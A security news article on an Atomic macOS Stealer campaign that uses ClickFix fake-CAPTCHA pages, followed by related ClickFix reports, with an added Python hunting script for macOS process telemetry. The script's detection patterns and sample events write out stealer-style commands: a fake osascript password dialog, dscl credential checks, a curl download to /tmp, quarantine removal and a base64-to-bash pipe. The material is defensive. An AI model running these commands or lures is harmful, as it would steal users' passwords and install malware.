The new Atomic macOS Stealer campaign targets Apple users by exploiting ClickFix

June 7, 2025
Cybersecurity researchers are warning of a new malware campaign that uses ClickFix social-engineering tactics to deliver an information stealer known as Atomic macOS Stealer (AMOS) to Apple macOS systems.

According to CloudSEK, the campaign is known to use typosquatted domains that mimic the US telecom provider Spectrum.

“macOS users are served a malicious shell script designed to steal system passwords and download an AMOS variant for further exploitation,” security researcher Koushik Pal said in a report published this week. “The script uses native macOS commands to harvest credentials, bypass security mechanisms, and execute malicious binaries.”

The activity is assessed to be the work of Russian-speaking cybercriminals, based on Russian-language comments in the malware’s source code.

The attack starts on a web page impersonating Spectrum (“PanelSpectrum(.)net” or “spectrum-ticket(.)net”). Visitors to the site are shown a message telling them to complete an hCaptcha verification check to confirm the security of their connection before proceeding further.

When the user ticks the “I am human” checkbox, however, the page shows an error reading “Captcha validation failed” and prompts them to click a button to proceed with “Alternative validation”.

Doing so copies a command to the user’s clipboard and displays a set of instructions that depends on the operating system: Windows users are told to open the Run dialog and paste a PowerShell command, while macOS users are told to open the Terminal app and run a shell script.

The shell script, for its part, prompts the user for their system password and downloads the next-stage payload, a known stealer called Atomic Stealer.
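What a defender can do with the chain described above, as an added example that is not part of the CloudSEK report or this article: a small Python hunting routine that scores each interactive shell launched from Terminal.app by the indicators found in its child processes (the native password prompt, credential validation, quarantine removal and staged execution that the report attributes to the script), and that can also score the pasted one-liner itself while it still sits on the clipboard or in shell history, before the pipeline is split into separate exec events. The event schema, the indicator regexes and their weights, the thresholds and the sample events are all my assumptions, not data from the page.

```python
"""Hunt for ClickFix-style execution chains in macOS process telemetry.

Added example for this article, not code from CloudSEK, Darktrace or the
campaign itself. The event schema (pid, ppid, parent, image, cmdline) and the
indicator list below are assumptions modelled on what an EDR or an Endpoint
Security exec-event collector normally records; the sample events are
constructed, not captured telemetry.
"""
import re
from collections import defaultdict

# Interactive shells Terminal.app launches; a ClickFix victim pastes into one of these.
SHELLS = {"/bin/sh", "/bin/bash", "/bin/zsh"}
TERMINAL_IMAGE = "/System/Applications/Utilities/Terminal.app/Contents/MacOS/Terminal"
TEMP_DIRS = r"(?:/tmp/|/private/tmp/|/var/folders/|\$TMPDIR)"

# (category, weight, pattern). Weights are an assumption: a native password
# prompt or a Gatekeeper bypass is far rarer in normal shell use than a download.
INDICATORS = [
    ("remote_script_to_shell", 3, re.compile(r"\bcurl\b[^|]*\|\s*(?:ba|z)?sh\b")),
    ("decoded_payload_to_shell", 3, re.compile(r"\bbase64\b[^|]*\|\s*(?:ba|z)?sh\b")),
    ("download_to_temp", 1, re.compile(r"\bcurl\b.*\s-(?:o|-output)\s+" + TEMP_DIRS)),
    ("native_password_prompt", 4,
     re.compile(r"\bosascript\b.*display dialog.*hidden answer", re.S)),
    ("password_validation", 4, re.compile(r"\bdscl\b\s+\.\s+-authonly\b")),
    ("quarantine_removal", 3, re.compile(r"\bxattr\s+-\w*[cd]\w*\b")),  # -d com.apple.quarantine / -c
    ("staged_binary_exec", 2, re.compile(r"\bchmod\s+(?:\+x|[0-7]*7[0-7]*)\s+" + TEMP_DIRS)),
    ("base64_decode", 1, re.compile(r"\bbase64\b\s+(?:-d|-D|--decode)\b")),
]

# Constructed sample events (hypothetical URL, user and paths; the password is a placeholder).
SAMPLE_EVENTS = [
    # Victim tree: Terminal -> interactive zsh -> pasted one-liner decodes and runs a script.
    {"pid": 501, "ppid": 1, "parent": "/sbin/launchd", "image": TERMINAL_IMAGE, "cmdline": TERMINAL_IMAGE},
    {"pid": 502, "ppid": 501, "parent": TERMINAL_IMAGE, "image": "/bin/zsh", "cmdline": "-zsh"},
    {"pid": 503, "ppid": 502, "parent": "/bin/zsh", "image": "/usr/bin/base64", "cmdline": "base64 -d"},
    {"pid": 504, "ppid": 502, "parent": "/bin/zsh", "image": "/bin/bash", "cmdline": "bash"},
    {"pid": 505, "ppid": 504, "parent": "/bin/bash", "image": "/usr/bin/osascript",
     "cmdline": "osascript -e 'display dialog \"System requires your password\" "
                "default answer \"\" with hidden answer'"},
    {"pid": 506, "ppid": 504, "parent": "/bin/bash", "image": "/usr/bin/dscl",
     "cmdline": "dscl . -authonly jdoe REDACTED"},
    {"pid": 507, "ppid": 504, "parent": "/bin/bash", "image": "/usr/bin/curl",
     "cmdline": "curl -fsSL https://example.invalid/update -o /tmp/.update"},
    {"pid": 508, "ppid": 504, "parent": "/bin/bash", "image": "/usr/bin/xattr", "cmdline": "xattr -c /tmp/.update"},
    {"pid": 509, "ppid": 504, "parent": "/bin/bash", "image": "/bin/chmod", "cmdline": "chmod +x /tmp/.update"},
    # Developer tree: Terminal -> zsh -> ordinary commands, including one lone base64 decode.
    {"pid": 601, "ppid": 1, "parent": "/sbin/launchd", "image": TERMINAL_IMAGE, "cmdline": TERMINAL_IMAGE},
    {"pid": 602, "ppid": 601, "parent": TERMINAL_IMAGE, "image": "/bin/zsh", "cmdline": "-zsh"},
    {"pid": 603, "ppid": 602, "parent": "/bin/zsh", "image": "/usr/bin/git", "cmdline": "git status"},
    {"pid": 604, "ppid": 602, "parent": "/bin/zsh", "image": "/usr/bin/base64", "cmdline": "base64 -D"},
]


def match_indicators(cmdline):
    """Return [(category, weight)] for every indicator the command line hits."""
    return [(cat, w) for cat, w, rx in INDICATORS if rx.search(cmdline)]


def classify_pasted_command(text):
    """Score a one-liner as it appears on the clipboard or in shell history,
    where `echo ... | base64 -d | bash` is still visible as a single pipeline."""
    hits = match_indicators(text)
    return {"score": sum(w for _, w in hits), "categories": sorted(c for c, _ in hits)}


def subtree(root_pid, children):
    """All descendants of root_pid (iterative DFS; telemetry trees can be deep)."""
    out, stack = [], [root_pid]
    while stack:
        for child in children.get(stack.pop(), []):
            out.append(child)
            stack.append(child["pid"])
    return out


def hunt(events, min_score=5, min_categories=2):
    """Score every interactive shell spawned by Terminal.app on the indicators
    found among its descendants. Each category counts once per shell, and both
    thresholds must be met, so a lone `base64 -D` in a developer's shell stays quiet."""
    children = defaultdict(list)
    for e in events:
        children[e["ppid"]].append(e)
    findings = []
    for e in events:
        if e["image"] not in SHELLS or e["parent"] != TERMINAL_IMAGE:
            continue
        hits, evidence = {}, []
        for proc in subtree(e["pid"], children):
            for cat, w in match_indicators(proc["cmdline"]):
                hits[cat] = w
                evidence.append((proc["pid"], cat, proc["cmdline"]))
        score = sum(hits.values())
        if score >= min_score and len(hits) >= min_categories:
            findings.append({"shell_pid": e["pid"], "score": score,
                             "categories": sorted(hits), "evidence": evidence})
    return findings


if __name__ == "__main__":
    for f in hunt(SAMPLE_EVENTS):
        print(f"shell pid {f['shell_pid']} score {f['score']}: {', '.join(f['categories'])}")
        for pid, cat, cmd in f["evidence"]:
            print(f"  {pid} [{cat}] {cmd}")
    print(classify_pasted_command("echo 'aGVsbG8K' | base64 -d | bash"))
```

The tree-level aggregation is the point: none of the individual commands is conclusive on its own (developers decode base64, download to /tmp and chmod files all day), but several of them under one shell that Terminal.app just started is exactly the shape of a pasted ClickFix one-liner. To use it against real data, feed it exec events from your EDR, extend `SHELLS` and the terminal image list to cover iTerm2 and other terminals, and tune the weights and thresholds against your own baseline.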


“Insufficient logic on the distribution site, such as cross-platform inconsistencies, points to a hastily constructed infrastructure,” Pal said.

“The distribution page for this AMOS variant campaign contained inaccuracies in both its programming and its front-end logic. For Linux user agents, the PowerShell command was copied. Additionally, the instruction ‘hold Windows key + R’ was displayed for both Windows and Mac users.”

The disclosure comes amid a surge over the past year in campaigns that use ClickFix tactics to deliver a wide range of malware families.

“Actors who carry out these targeted attacks usually use similar tactics, techniques and procedures (TTPs) to gain initial access,” Darktrace said. “These include delivering malicious payloads through spear-phishing attacks, drive-by compromises, or abuse of trust in familiar online platforms such as GitHub.”

Links distributed through these vectors typically redirect end users to malicious URLs, which then deceive them into running malicious commands to fix problems that do not exist.

The end result of this effective social-engineering method is that users compromise their own systems, allowing threat actors to bypass security controls.

The cybersecurity company said it has identified multiple ClickFix attacks across customer environments in Europe, the Middle East and Africa (EMEA) and the US. While these campaigns have gathered steam and employ several variations, they share the same end goal of delivering malicious payloads, ranging from trojans to stealers to ransomware.


Earlier this week, Cofense outlined an email phishing campaign that spoofs Booking.com and targets the hotel and food-service sectors with fake CAPTCHA pages leading to XWorm RAT, PureLogs Stealer and DanaBot. The fact that ClickFix is flexible and easy to adapt makes it an attractive malware-distribution mechanism.

“Although the exact email structure varies from sample to sample, these campaigns generally deliver booking(.)com-spoofing emails with embedded links to ClickFix fake CAPTCHA sites, which are used to deliver malicious scripts that run RATs and information stealers,” Cofense said.

The email security company also observed a ClickFix sample that mimics a cookie-consent banner: clicking the “Accept” button downloads a malicious script file, and the user is then asked to run the script in order to accept cookies.

In one April 2025 incident analyzed by Darktrace, ClickFix was used as the initial attack vector to dig deeper into the target environment, move laterally, send system information to an external server via HTTP POST requests, and ultimately exfiltrate data.

“ClickFix baiting is a widely used tactic in which threat actors leverage human error to bypass security defenses,” Darktrace said. “By tricking endpoint users into performing seemingly harmless, everyday actions, attackers gain initial access to systems from which they can access and exfiltrate sensitive data.”

Other ClickFix attacks use fake versions of other popular CAPTCHA services, such as Google reCAPTCHA and Cloudflare Turnstile, to deliver malware under the guise of routine security checks.

These fake pages are “pixel-perfect copies” of their legitimate counterparts and are sometimes injected into genuinely compromised websites to trick unsuspecting users. Stealers such as Lumma and StealC, as well as full-fledged remote access trojans such as NetSupport RAT, are among the payloads distributed via fake Turnstile pages.


“Modern internet users are conditioned to click through spam checks, CAPTCHAs and security prompts on websites as quickly as possible,” said Daniel Kelley of SlashNext. “Attackers know this and take advantage of this ‘validation fatigue’: many users see such prompts as routine and simply follow the steps presented.”
